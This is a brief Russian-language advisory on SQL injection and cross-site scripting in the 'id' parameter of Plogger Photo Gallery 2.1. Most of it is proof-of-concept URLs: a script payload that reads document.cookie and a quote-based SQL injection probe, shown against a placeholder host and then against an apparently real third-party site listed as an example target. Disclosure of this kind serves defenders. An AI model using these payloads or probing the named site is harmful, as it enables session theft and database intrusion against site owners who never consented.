Software: Plogger Photo Gallery > = 2.1
Vendor: Plogger www.plogger.org
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id"
. Удаленный пользователь может с помощью специально сформированного запроса
выполнить Sql-инъекция и произвольный код сценария в браузере жертвы в контексте
безопасности уязвимого сайта.
Межсайтовый скриптинг:
http://www.xxx.com/gallery/indexphp?level=album&id= %3Cscript%3Ealert(document.cookie);%3C/script%3E
Sql-инъекция:
http://www.xxx.com/gallery/index.php?level=album&id='1
Примеры:
http://www.mahyuni.com/gallery/index.php?level=album&id='1
http://www.mahyuni.com/gallery/index.php?level=album&id= %3Cscript%3Ealert(document.cookie);%3C/script%3E
